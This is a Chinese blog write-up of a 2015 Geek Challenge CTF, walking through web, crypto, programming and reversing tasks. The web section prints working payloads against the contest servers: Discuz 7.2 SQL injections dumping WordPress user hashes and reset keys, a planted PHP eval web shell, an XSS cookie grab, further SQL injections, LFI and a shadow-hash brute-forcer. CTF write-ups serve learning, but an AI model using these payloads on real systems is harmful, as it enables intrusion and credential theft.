第六届极客大挑战writeup

web500

1
柠檬牛接了个项目,听说他十分钟就搞定了。你可以吗? http://hackme.sycsec.com

访问http://hackme.sycsec.com,可以发现有discuz 7.2 漏洞,可以在faq.php进行sql注入。 http://www.waitalone.cn/discuz72-faq-exp.html 有个faq.php注入工具 首先注入得到WordPress数据库:

1
2
3
4
http://hackme.sycsec.com/faq.php

POST
action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select distinct table_schema from information_schema.tables limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

使用同样的方法注入得到wp_user里面的数据:
注入wp_users表中的数据:

1
2
3
4
action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(id,user_login,user_pass,0x20,user_status,0x20,user_nicename,0x20,user_email,0x20,user_activation_key) from wordpress.wp_users limit 1,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)#

获得admin的数据:
admin $P$BIB5534oip5rzWrS2u76LJIoWaMetP/ 0 admin sycweb3@163.com

这里需要思考怎么利用得到的数据,登录后台。找到了利用user_activation_key重置admin密码的方法:

1
http://www.ilovtina.com/2014/01/03/sql_injection/

首先点击找回密码,然后注入得到user_activation_key如下:

1
2
3
4
action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(id,user_email,0x20,hex(user_activation_key),0x20) from wordpress.wp_users limit 0,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)#

获得数据:
Error: Duplicate entry '1sycweb3@163.com 7136775859785A39716B74765968674567563950 1' for key 'group_key'

这里就得到了激活key了,即:q6wXYxZ9qktvYhgEgV9P,然后拼凑激活地址:

1
2
wp-login.php?action=rp&key=q6wXYxZ9qktvYhgEgV9P&login=admin
访问即可重置密码。

登录进入后台后,编辑Akismet插件获得shell.

1
2
3
4
5
6
7
编辑akismet/akismet.php,写入shell
fputs(fopen('./angelshell.php',"w"),'<?php eval($_POST[\'chopper123\']);?>');

访问http://hackme.sycsec.com/blog/wp-content/plugins/akismet/akismet.php
得到shell:
地址:http://hackme.sycsec.com/blog/wp-content/plugins/akismet/angelshell.php
密码:chopper123

这时候,用菜刀连接即可。 根目录下得到flag: 不知如何搞定接下来。

三叶草留言板

1
看不见才好玩,快来盲打吧!ps:做了小小的过滤 http://web1.sycsec.com/e1f29a7ed5acf42fba22c758cb20ed6c/

后来给了个测试程序:

1
2
3
输入<script src=123 />
发现将src转义为0了.
得到<script 0=123 />

简单的POC,使用location.href即可:

1
<script>location.href='你的xss地址'</script>

即可获得cookie登录后台,得到flag。

Bypass_it

1
http://upload.sycsec.com/

上传.php5 后缀文件,即可获得flag。

sqli2

考的是宽字节注入使用%aa突破单引号.
http://www.jinglingshu.org/?p=534

1
http://sql.sycsec.com/f8077f08525d33bd7f0b1fd98b53dc59/?uid=1%aa'  union all select key_flag from `[key_flag]`%20%23

sqli3

  • order by 报错注入 http://joychou.org/index.php/web/SQL-Injections-in-MySQL-LIMIT-clause.html

  • 简单的绕过过滤. 空格用注释/**/代替

    报错注入出数据库名:
    http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1/*asdf*/PROCEDURE/*asdf*/analyse(extractvalue(rand(),concat(0x3a,database())),1)%23
    XPATH syntax error: ':rgvk8278b4utx6ei'
    
    报错注入出表名:
    http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1/*asdf*/PROCEDURE/*asdf*/analyse(extractvalue(rand(),concat(0x3a,(select/*asdf*/table_name/*asdf*/from/*asdf*/information_schema.tables/*asdf*/where/*asdf*/table_schema='rgvk8278b4utx6ei'/*asdf*/limit/*asdf*/0,1))),1)%23
    XPATH syntax error: ':#flag_this'
    
    报错注入出flag:
    http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1/*asdf*/PROCEDURE/*asdf*/analyse(extractvalue(rand(),concat(0x3a,(select/*asdf*/flag/*asdf*/from/*asdf*/`%23flag_this`))),1)%23

小明

1
http://web1.sycsec.com/d900342ce35a24bca80c965e4380056f/ 小明? 嗯。怎么了,老师? 滚出去。

php lfi读取页面源码:

1
2
3
php://filter/read=convert.base64-encode/resource=文件名

http://web1.sycsec.com/d900342ce35a24bca80c965e4380056f/include.php?file=php://filter/read=convert.base64-encode/resource=README.php

遗失的密码

1
2
3
4
http://geek.sycsec.com/download/linux/l718f4a7c8c81b0bc4f48f7f869e1ac7.html
某天撸下了一台服务器,通过收集信息来看,管理员joker最喜欢用这样的密码: 用户名+日期 ,大家帮我找到这个密码吧,(flag为SYC{密码})

root:$6$F84utBXh$g2dDb6QXacuId.5NDwrvyPxIJGxiU8gyhTywRP5jksb6e/CgeG94/THLJhgZ4oB8hPowrLPdmVWFIZTBZdT6S/:16680:0:99999:7:::

思路即为编程爆破这个linux密码.
简单研究下这个密码格式.http://www.berlinix.com/linux/shadow.php
用python自带的加密库进行编程爆破:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import sys
import crypt, getpass, pwd

from datetime import date
from dateutil.rrule import rrule, DAILY


reslut = "$6$F84utBXh$g2dDb6QXacuId.5NDwrvyPxIJGxiU8gyhTywRP5jksb6e/CgeG94/THLJhgZ4oB8hPowrLPdmVWFIZTBZdT6S/"
a = date(1940, 1, 1)
b = date(2015, 10,30)

for dt in rrule(DAILY, dtstart=a, until=b):
passdate = dt.strftime("%Y%m%d")
# root:$6$F84utBXh$g2dDb6QXacuId.5NDwrvyPxIJGxiU8gyhTywRP5jksb6e/CgeG94/THLJhgZ4oB8hPowrLPdmVWFIZTBZdT6S/:16680:0:99999:7::
passwd = "joker" + passdate
print passwd
crypted = crypt.crypt(passwd, '$6$F84utBXh$')
print crypted
if crypted == "$6$F84utBXh$g2dDb6QXacuId.5NDwrvyPxIJGxiU8gyhTywRP5jksb6e/CgeG94/THLJhgZ4oB8hPowrLPdmVWFIZTBZdT6S/" :
print "success"
exit()

print reslut == "$6$F84utBXh$g2dDb6QXacuId.5NDwrvyPxIJGxiU8gyhTywRP5jksb6e/CgeG94/THLJhgZ4oB8hPowrLPdmVWFIZTBZdT6S/"

消失的flag

1
2
3
http://geek.sycsec.com/download/program/program200/bb90845ac4be58ac811afb22360ea3d8.html

女神不小心把自己的密码rm掉了,但是聪明的女神早已经把分段的flag的校验信息给了云备胎保存。机智的你破解了女神的wifi,在中间人攻击的过程中你获取到了云备胎发送过来的流量,流量中包含着云备胎发过来的5个png格式的图片,你能解密女神的flag的吗?

用wireshark(follow tcp stream 功能)和winhex,得到五张图片。发现上面是校验码: 可以分析得知,需要通过CRC32校验码,反推4个字节(4个ascii字符)的内容。 找了好久,找到了php官网上写的CRC32校验的源码。
分析学习CRC32校验原理后,得到如下代码,不愧为最好的语言:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
<?php

function bitbybit_crc32($str,$first_call=false){

//reflection in 32 bits of crc32 polynomial 0x04C11DB7
$poly_reflected=0xEDB88320;

//=0xFFFFFFFF; //keep track of register value after each call
static $reg=0xFFFFFFFF;

//initialize register on first call
if($first_call) $reg=0xFFFFFFFF;

$n=strlen($str);
$zeros=$n<4 ? $n : 4;

//xor first $zeros=min(4,strlen($str)) bytes into the register
for($i=0;$i<$zeros;$i++)
$reg^=ord($str{$i})<<$i*8;

//now for the rest of the string
for($i=4;$i<$n;$i++){
$next_char=ord($str{$i});
for($j=0;$j<8;$j++)
$reg=(($reg>>1&0x7FFFFFFF)|($next_char>>$j&1)<<0x1F)
^($reg&1)*$poly_reflected;
}

//put in enough zeros at the end
for($i=0;$i<$zeros*8;$i++)
$reg=($reg>>1&0x7FFFFFFF)^($reg&1)*$poly_reflected;

echo '$reg:'.$reg."<br />";
//xor the register with 0xFFFFFFFF
return ~$reg;
}

function bitbybit_crc32_reverse( $data){
//reflection in 32 bits of crc32 polynomial 0x04C11DB7
$poly_reflected=0xEDB88320;

//=0xFFFFFFFF; //keep track of register value after each call
$reg= ~$data ;

//initialize register on first call

$n=strlen($data);
$zeros=$n<4 ? $n : 4;

//put in enough zeros at the end
for($i=0;$i<$zeros*8;$i++)
{
if(($reg>>31)&1)
{
$reg=($reg)^$poly_reflected;
$reg = ($reg << 1)|1;
}
else
{
$reg = ($reg << 1)&0xFFFFFFFE;
}
}

echo '$reg:'.$reg."<br />";
//xor the register with 0xFFFFFFFF
return ~$reg;

}

function print_hex($data)
{

echo '<br />';
for($i = 0; $i < 4;$i++)
{
echo chr(($data >> 8*$i)%pow(2, 8));
}
echo '<br />';
}

$str="cRc3"; //whatever
$blocksize=4; //whatever

for($i=0;$i<strlen($str);$i+=$blocksize)
{
$crc=bitbybit_crc32(substr($str,$i,$blocksize),!$i);
echo '$crc:'.$crc ."<br/>";
echo '~$crc:'.~$crc ."<br/>";
printf("%x\n", $crc);
}

$data=0x96ef245d;
$data_reverse = bitbybit_crc32_reverse($data);
printf("%x\n", $data_reverse);
print_hex($data_reverse);

$data=0xe10baad1;
$data_reverse = bitbybit_crc32_reverse($data);
printf("%x\n", $data_reverse);
print_hex($data_reverse);

$data=0x082ee868;
$data_reverse = bitbybit_crc32_reverse($data);
printf("%x\n", $data_reverse);
print_hex($data_reverse);

$data=0x64af8482;
$data_reverse = bitbybit_crc32_reverse($data);
printf("%x\n", $data_reverse);
print_hex($data_reverse);


?>

整理得到flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
96ef245d
138561fb21cde19596a9cd0ee487458c6716f59a
33635263
cRc3

e10baad1
73e490e57bbeaa21c92175048151c15c18cf6e6f
30435f32
2_C0

082ee868
eb74e94271a227b241c4d631c2e98367281a4058
7369316c
l1is

64af8482
978c3eec59bea942ed8b619c33544a8e5759db27
7d4e6f69
ioN}

SYC{cRc32_C0l1isioN}

Transposition cipher

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
详情请看 http://geek.sycsec.com/download/program/program100/Transposition_cipher.html
在古典密码学中,Caesar密码、Playfair密码、Hill密码、Vigenere密码都是经典的替换密码(Substitution cipher),与之极不相同的一种加密方法是对明文进行置换,这种密码称为置换密码(Transposition cipher)。

最简单的例子是栅栏密码,按照对角线的顺序写出明文,而按行的顺序读出作为密文。例如,用深度为2的栅栏技术加密信息“meet me after the toga party”,可写为

m e m a t r h t g p r y
e t e f e t e o a a t

加密后的信息是MEMATRHTGPRYETEFETEOAAT
这种技巧是对密码分析者来说实在微不足道。一个更复杂的方案是把消息一行一行地写成矩形块,然后按列读出,但是把列的次序打乱。列的次序就是算法的密钥。例如:
密钥 4 3 1 2 5 6 7
明文 a t t a c k
明文 p o s t p o n
明文 e u n t i l
明文 t w o x y

密文:tsuwatnoto tape cpt koix nly

那么问题来了,2015820日这天女神收到了程序猿的一封信,信的内容点击下载,那位程序猿告诉她信的内容使用了上面那个复杂的方案加密了,并且告诉她密钥是7, 6, 5, 2, 1, 3, 4,你能帮助女神解密吗?可怜的程序猿能表白成功吗?

简单的解密码编程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
__author__ = 'angelwhu'

import sys

def genMatrix(rows,cols):
matrix = [[0 for col in range(cols)] for row in range(rows)]
return matrix

def decode(chars,key):
cols = len(key)
rows = 0
if len(chars) % len(key) == 0 :
rows = len(chars) / len(key)
else :
rows = len(chars) / len(key) + 1

matrix = genMatrix(rows,cols)
i = 0
row = 0
col = 0
for char in chars :
row = i % rows
col = key[i / rows]
matrix[row][col] = char
i = i + 1
for i in range(rows) :
for j in range(cols):
sys.stdout.write(str(matrix[i][j]))

def test():
chars = 'tsuwatnoto tape cpt koix nly'
key_orgi = [4,3,1,2,5,6,7]
key = [2,3,1,0,4,5,6]
decode(chars,key)
def go():
key_orig = [7, 6, 5, 2, 1, 3, 4]
key = [4,3,5,6,2,1,0]
# for line in open('ciphertext.txt'):
#chars = 'pxh !ra o efpy s y i(amhrrfcafc es tixt u eatehsatiid ayefneha oe eid.or enn '
f = open('ciphertext.txt')
chars = f.read()
decode(chars,key)

if __name__ == '__main__':
go()

土豪的密码

1
http://geek.sycsec.com/download/program/program250/9b487a999aaa807d77305aac9d09f059.html

加密程序如下:

1
2
3
4
5
6
7
plain = 'this is the plaintext'
cipher = ''
for i in plain:
cipher += chr((7 * (ord(i) - 32) + 25) % 96 + 32)
print cipher.encode('hex')

# *PI.^oar[JQ >%IIt"{<rHrP

简单的逆向解密编程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def bit_decrypt():
chars = '*PI.^oar[JQ >%IIt"{<rHrP';
res = ''
for c in chars:
tmp = ord(c) - 32
if tmp - 25 < 0 :
i = 1;
else :
i = 0;

original = tmp + 96 * i - 25
while(original % 7 !=0):
i = i + 1
original = tmp + 96 * i - 25

res += chr(original/7 + 32)

print res;

手速够不够快?

1
锻炼了多年的手速来这里看看够不够快 nc 222.18.158.229 30002

这是个简单的socket编程,端口是个base64解码程序。不断发解析结果过去即可,调了许多次,成果了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
__author__ = 'angelwhu'

import socket
import base64

port = 1235
ip = '222.18.158.229'
buf = 102400


def getResult(input):
strRes = base64.b64decode(input)
return strRes


if __name__ == '__main__':
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip,port))
Round = 1
data = ''

while True :
input_data = sock.recv(buf)
print str(Round) + ': \n'+ input_data
if Round > 1:
dataarr = input_data.split('\n')
#print dataarr
if Round == 2:
data = dataarr[2]
print data
if Round%2 == 1:
data = dataarr[0]
print data
if Round%2 == 0:
res = getResult(data.strip())
print res
sock.send(res)
Round = Round + 1
sock.close()

会不会写代码?

1
会不会写代码?听说里面隐藏了一个flag(syc是要大写),http://geek.sycsec.com/download/misc/gbab7854e8c894a53c456d6da30bec68

下载下来是一个zip文件。使用winrar解压,可以看到是git结构,使用git命令查看历史进行恢复:

1
2
git log
git reset --hard d7adbc321c253a2097e5ba1b0ea7fa489fb4c468

回到存在flag的commit,得到flag.

简单Win_RE

1
http://geek.sycsec.com/download/re/win/Re100.exe 简单的re

是个简单的异或运算逻辑。调换字节的顺序。

简单的linux逆向

1
http://geek.sycsec.com/download/re/linux/cm1 非常非常简单的linux crackme!! flag加上 SYC{} 后提交 :)

可以找到字符串E`1z[F1fkbUFiRFnftMUa{

然后进行逻辑运算与其比对:

好简单啊

1
http://geek.sycsec.com/download/re/win/easy 哈哈哈哈哈...这个真的好简单啊 just have fun :)

用ida打开,寻找到如下逻辑。手工运算得到flag。

1
SYC{1341910478870402}

总结

最终得了4300分,学到了许多知识。这次算是做的最好的一次,以后加油!

文章作者: angelwhu
文章链接: https://www.angelwhu.com/paper/2015/11/02/the-sixth-geek-big-challenge-writeup/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 angelwhu_blog